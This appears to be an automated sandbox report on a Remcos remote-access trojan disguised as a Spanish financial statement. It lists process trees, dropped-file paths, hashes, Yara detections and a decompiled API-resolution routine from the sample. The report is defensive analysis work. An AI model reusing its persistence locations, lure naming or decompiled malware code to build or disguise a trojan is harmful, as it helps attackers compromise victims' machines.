                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.780636700.0000000003E8B000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.781443613.00000000049AD000.00000004.00000001.sdmp, Author: Joe Security
                                      Reputation:low

                                      Chronological Activities

                                      Analysis Process: cmd.exe PID: 7004 Parent PID: 5772

                                      General

                                      Start time:06:03:13
                                      Start date:29/04/2021
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                      Imagebase:0x11d0000
                                      File size:232960 bytes
                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Chronological Activities

                                      Analysis Process: conhost.exe PID: 6968 Parent PID: 7004

                                      General

                                      Start time:06:03:13
                                      Start date:29/04/2021
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff724c50000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Chronological Activities

                                      Analysis Process: timeout.exe PID: 7056 Parent PID: 7004

                                      General

                                      Start time:06:03:13
                                      Start date:29/04/2021
                                      Path:C:\Windows\SysWOW64\timeout.exe
                                      Wow64 process (32bit):true
                                      Commandline:timeout 1
                                      Imagebase:0xb30000
                                      File size:26112 bytes
                                      MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Chronological Activities

                                      Analysis Process: PxxoServicesTrialNet1.exe PID: 7068 Parent PID: 5772

                                      General

                                      Start time:06:03:17
                                      Start date:29/04/2021
                                      Path:C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
                                      Imagebase:0x320000
                                      File size:1912320 bytes
                                      MD5 hash:2E91E5E3D39CE4155EDAD4F2A3ACF916
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low

                                      Chronological Activities

                                      Analysis Process: PxxoServicesTrialNet1.exe PID: 7144 Parent PID: 3424

                                      General

                                      Start time:06:03:17
                                      Start date:29/04/2021
                                      Path:C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe'
                                      Imagebase:0x530000
                                      File size:1912320 bytes
                                      MD5 hash:2E91E5E3D39CE4155EDAD4F2A3ACF916
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.752626728.0000000003279000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.759339292.0000000003C85000.00000004.00000001.sdmp, Author: Joe Security
                                      Reputation:low

                                      Chronological Activities

                                      Analysis Process: PxxoServicesTrialNet1.exe PID: 4480 Parent PID: 5772

                                      General

                                      Start time:06:03:18
                                      Start date:29/04/2021
                                      Path:C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
                                      Imagebase:0x870000
                                      File size:1912320 bytes
                                      MD5 hash:2E91E5E3D39CE4155EDAD4F2A3ACF916
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Remcos_1, Description: Remcos Payload, Source: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                      Reputation:low

                                      Chronological Activities

                                      Analysis Process: cmd.exe PID: 5048 Parent PID: 6648

                                      General

                                      Start time:06:03:19
                                      Start date:29/04/2021
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                      Imagebase:0x11d0000
                                      File size:232960 bytes
                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Chronological Activities

                                      Analysis Process: conhost.exe PID: 1368 Parent PID: 5048

                                      General

                                      Start time:06:03:19
                                      Start date:29/04/2021
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff724c50000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Chronological Activities

                                      Analysis Process: timeout.exe PID: 1444 Parent PID: 5048

                                      General

                                      Start time:06:03:20
                                      Start date:29/04/2021
                                      Path:C:\Windows\SysWOW64\timeout.exe
                                      Wow64 process (32bit):true
                                      Commandline:timeout 1
                                      Imagebase:0xb30000
                                      File size:26112 bytes
                                      MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Chronological Activities

                                      Analysis Process: WerFault.exe PID: 6388 Parent PID: 5772

                                      General

                                      Start time:06:03:22
                                      Start date:29/04/2021
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5772 -s 1448
                                      Imagebase:0xbd0000
                                      File size:434592 bytes
                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET

                                      Chronological Activities

                                      Analysis Process: PxxoServicesTrialNet1.exe PID: 6360 Parent PID: 6648

                                      General

                                      Start time:06:03:25
                                      Start date:29/04/2021
                                      Path:C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
                                      Imagebase:0x220000
                                      File size:1912320 bytes
                                      MD5 hash:2E91E5E3D39CE4155EDAD4F2A3ACF916
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Chronological Activities

                                      Analysis Process: PxxoServicesTrialNet1.exe PID: 6788 Parent PID: 6648

                                      General

                                      Start time:06:03:26
                                      Start date:29/04/2021
                                      Path:C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
                                      Imagebase:0xf80000
                                      File size:1912320 bytes
                                      MD5 hash:2E91E5E3D39CE4155EDAD4F2A3ACF916
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000021.00000002.728536035.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Remcos_1, Description: Remcos Payload, Source: 00000021.00000002.728536035.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000021.00000002.728536035.0000000000400000.00000040.00000001.sdmp, Author: unknown

                                      Chronological Activities

                                      Analysis Process: WerFault.exe PID: 6596 Parent PID: 6648

                                      General

                                      Start time:06:03:29
                                      Start date:29/04/2021
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6648 -s 1476
                                      Imagebase:0xbd0000
                                      File size:434592 bytes
                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET

                                      Chronological Activities

                                      Analysis Process: cmd.exe PID: 2240 Parent PID: 7144

                                      General

                                      Start time:06:03:29
                                      Start date:29/04/2021
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                      Imagebase:0x11d0000
                                      File size:232960 bytes
                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Chronological Activities

                                      Analysis Process: conhost.exe PID: 4928 Parent PID: 2240

                                      General

                                      Start time:06:03:30
                                      Start date:29/04/2021
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff724c50000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Chronological Activities

                                      Analysis Process: timeout.exe PID: 6224 Parent PID: 2240

                                      General

                                      Start time:06:03:30
                                      Start date:29/04/2021
                                      Path:C:\Windows\SysWOW64\timeout.exe
                                      Wow64 process (32bit):true
                                      Commandline:timeout 1
                                      Imagebase:0xb30000
                                      File size:26112 bytes
                                      MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Chronological Activities

                                      Disassembly

                                      Code Analysis

                                      Reset < >

                                        Analysis Process: EXTRACTOSERFINANZA989543704031499704092798964.exe PID: 6880 Parent PID: 5864 EXTRACTOSERFINANZA989543704031499704092798964.exeCOMMON

                                        Executed Functions

                                        Function 056D1158, Relevance: 1.7, APIs: 1, Instructions: 230COMMON
                                        Download Yara Rule
                                        APIs
                                        • KiUserExceptionDispatcher.NTDLL ref: 056D11B1
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.715862513.00000000056D0000.00000040.00000001.sdmp, Offset: 056D0000, based on PE: false
                                        Similarity
                                        • API ID: DispatcherExceptionUser
                                        • String ID:
                                        • API String ID: 6842923-0
                                        • Opcode ID: 2edce9ec2a047d1c88bcabe39d3a2e7429d142b324f20ed51a28141933c8026c
                                        • Instruction ID: 65c0ac0e87ccb77ecf14ab71248ee8bf6028a994820035420b96fa4e8305c5fd
                                        • Opcode Fuzzy Hash: 2edce9ec2a047d1c88bcabe39d3a2e7429d142b324f20ed51a28141933c8026c
                                        • Instruction Fuzzy Hash: 12A12870E041098BDB28CFE9D494BACFBB1BF46359F188518D402BB790D7B99A85CB64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 056D1148, Relevance: 1.7, APIs: 1, Instructions: 160COMMON
                                        Download Yara Rule
                                        APIs
                                        • KiUserExceptionDispatcher.NTDLL ref: 056D11B1
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.715862513.00000000056D0000.00000040.00000001.sdmp, Offset: 056D0000, based on PE: false
                                        Similarity
                                        • API ID: DispatcherExceptionUser
                                        • String ID:
                                        • API String ID: 6842923-0
                                        • Opcode ID: 695670e3e318cf95be57dcae71f476e73401e3656f08cbd3688cd3bcff60128a
                                        • Instruction ID: 5a7425d95418164176e9deb32ed52fb1d6b3fde891c5199bf6beb3af1c6e9a70
                                        • Opcode Fuzzy Hash: 695670e3e318cf95be57dcae71f476e73401e3656f08cbd3688cd3bcff60128a
                                        • Instruction Fuzzy Hash: E0612770D00249CBDB24CFE8D498AADFBB2BF4A318F148519D412BB781D7B59985CB64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 056D1088, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetKernelObjectSecurity.KERNELBASE(?,?,00000000), ref: 056D1106
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.715862513.00000000056D0000.00000040.00000001.sdmp, Offset: 056D0000, based on PE: false
                                        Similarity
                                        • API ID: KernelObjectSecurity
                                        • String ID:
                                        • API String ID: 3015937269-0
                                        • Opcode ID: 636a13bd36fe008c248e5f6261c1f9daf10508cd22b1fd0fc7f2ffa397244b06
                                        • Instruction ID: 3a6e46c995557a798cde70ec10ca4364c61f80ded3030c9f297a7b851d3138e1
                                        • Opcode Fuzzy Hash: 636a13bd36fe008c248e5f6261c1f9daf10508cd22b1fd0fc7f2ffa397244b06
                                        • Instruction Fuzzy Hash: 542107B1D042098FCB10CF9AC885B9EFBF4EB49324F14842AE519A7740D778A945CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 056D0238, Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.715862513.00000000056D0000.00000040.00000001.sdmp, Offset: 056D0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 6b5c8e1009c115fb5ec99e9434e89a4c6b72812118395baa9310a4b167f01ee8
                                        • Instruction ID: fffce7c9d319ddf0c702655a683959f5252be27f754a73ee674a55efbab10199
                                        • Opcode Fuzzy Hash: 6b5c8e1009c115fb5ec99e9434e89a4c6b72812118395baa9310a4b167f01ee8
                                        • Instruction Fuzzy Hash: 34116AB1D003498FCB14CFA9C4497DEFBF4AB88324F14882AC555A7740CB78A945CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 056D0240, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.715862513.00000000056D0000.00000040.00000001.sdmp, Offset: 056D0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: d2de8f643855247747fca3888b3fc93b6ff15b7d6f6c63cb1a391ca6a8f6f6bd
                                        • Instruction ID: 76033fd4bf6b9cccce241a9bd6e02c1df1bbc6d69b610f2a7c8438546a4f20c0
                                        • Opcode Fuzzy Hash: d2de8f643855247747fca3888b3fc93b6ff15b7d6f6c63cb1a391ca6a8f6f6bd
                                        • Instruction Fuzzy Hash: AF113AB1D043488FCB10DFAAC4487DEFBF4EF88224F14842AD559A7740DB75A945CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Analysis Process: EXTRACTOSERFINANZA989543704031499704092798964.exe PID: 6292 Parent PID: 6880 EXTRACTOSERFINANZA989543704031499704092798964.exeCOMMON

                                        Executed Functions

                                        Function 00409908, Relevance: 75.3, APIs: 26, Strings: 17, Instructions: 92libraryloaderCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00409908() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;
				_Unknown_base(*)()* _t22;

				_t1 = LoadLibraryA("Psapi.dll"); // executed
				_t2 = GetProcAddress(_t1, "GetModuleFileNameExA");
				 *0x41bc94 = _t2;
				if(_t2 == 0) {
					 *0x41bc94 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
				}
				 *0x41bc90 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
				if( *0x41bc94 == 0) {
					 *0x41bc90 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
				}
				 *0x41bca0 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
				 *0x41c1e4 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				 *0x41c1e8 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
				 *0x41bc98 = GetProcAddress(GetModuleHandleA("Shell32"), "IsUserAnAdmin");
				 *0x41bcd0 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
				 *0x41bca4 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
				 *0x41bc78 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
				 *0x41bca8 = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
				_t22 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
				 *0x41bc9c = _t22;
				return _t22;
			}






                                        0x0040991b
                                        0x00409924
                                        0x0040992c
                                        0x00409933
                                        0x00409944
                                        0x00409944
                                        0x0040995f
                                        0x00409964
                                        0x00409975
                                        0x00409975
                                        0x00409993
                                        0x004099a7
                                        0x004099bb
                                        0x004099cf
                                        0x004099e3
                                        0x004099f7
                                        0x00409a0b
                                        0x00409a1c
                                        0x00409a24
                                        0x00409a28
                                        0x00409a2e

                                        APIs
                                        • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,0041BA38,0041BCB0,00000000,00408F24,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040991B
                                        • GetProcAddress.KERNEL32(00000000), ref: 00409924
                                        • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040993F
                                        • GetProcAddress.KERNEL32(00000000), ref: 00409942
                                        • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409953
                                        • GetProcAddress.KERNEL32(00000000), ref: 00409956
                                        • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409970
                                        • GetProcAddress.KERNEL32(00000000), ref: 00409973
                                        • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409984
                                        • GetProcAddress.KERNEL32(00000000), ref: 00409987
                                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409998
                                        • GetProcAddress.KERNEL32(00000000), ref: 0040999B
                                        • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099AC
                                        • GetProcAddress.KERNEL32(00000000), ref: 004099AF
                                        • GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099C0
                                        • GetProcAddress.KERNEL32(00000000), ref: 004099C3
                                        • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099D4
                                        • GetProcAddress.KERNEL32(00000000), ref: 004099D7
                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099E8
                                        • GetProcAddress.KERNEL32(00000000), ref: 004099EB
                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099FC
                                        • GetProcAddress.KERNEL32(00000000), ref: 004099FF
                                        • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409A10
                                        • GetProcAddress.KERNEL32(00000000), ref: 00409A13
                                        • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409A21
                                        • GetProcAddress.KERNEL32(00000000), ref: 00409A24
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$HandleModule$LibraryLoad
                                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$Psapi.dll$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$user32
                                        • API String ID: 551388010-2914448473
                                        • Opcode ID: 94181ff0da5f878129800e6c898616cd0638ed43b76235def3f7d6061dc3ba3f
                                        • Instruction ID: 4c9355c828fc4da35060c465c8423d7dda30a1a04bb52c9e9a5aad065eac730d
                                        • Opcode Fuzzy Hash: 94181ff0da5f878129800e6c898616cd0638ed43b76235def3f7d6061dc3ba3f
                                        • Instruction Fuzzy Hash: F721AFB0E81358B9DA206BB56C4EFDB7E59DA94B54323442BB40893194EFBCC480CEDC
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00408C98, Relevance: 261.7, APIs: 133, Strings: 16, Instructions: 938synchronizationthreadCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00409823: malloc.MSVCRT ref: 00409846
                                          • Part of subcall function 00409823: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00409872
                                          • Part of subcall function 00409823: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040987E
                                          • Part of subcall function 00409823: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409887
                                          • Part of subcall function 00409823: malloc.MSVCRT ref: 00409898
                                          • Part of subcall function 00409823: free.MSVCRT(?,?,?,00000000,00408CAD,00000000), ref: 004098E3
                                          • Part of subcall function 00409823: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004098F1
                                          • Part of subcall function 00409823: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004098FA
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BC80,?,?,00000000), ref: 00408CB7
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00408CC6
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(licence_code.txt,00000012,00000001,00000000), ref: 00408D31
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000034), ref: 00408D42
                                        • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,00000000), ref: 00408D50
                                        • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408D5E
                                        • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408D6A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408D73
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,00000000), ref: 00408D8C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(004140D8,Software\,00000000,0000000E,00415774), ref: 00408DB4
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0000000E,00415774), ref: 00408DC1
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,0000000E,00415774), ref: 00408DD1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,00415774), ref: 00408DDA
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,00415774), ref: 00408DE3
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000032,00000000,?,?,?,?,0000000E,00415774), ref: 00408DF5
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000033,00000000,?,?,?,?,0000000E,00415774), ref: 00408E11
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,004140D8,?,?,?,?,0000000E,00415774), ref: 00408E37
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408E56
                                        • OpenMutexA.KERNEL32 ref: 00408E80
                                        • WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,?,?,0000000E,00415774), ref: 00408E93
                                        • CloseHandle.KERNEL32(004140D8,?,?,?,?,0000000E,00415774), ref: 00408E9C
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,0000000E,00415774), ref: 00408EAD
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408ECC
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000E,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408EEF
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408EFA
                                        • CreateMutexA.KERNELBASE(00000000,00000001,00000000,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F04
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F0A
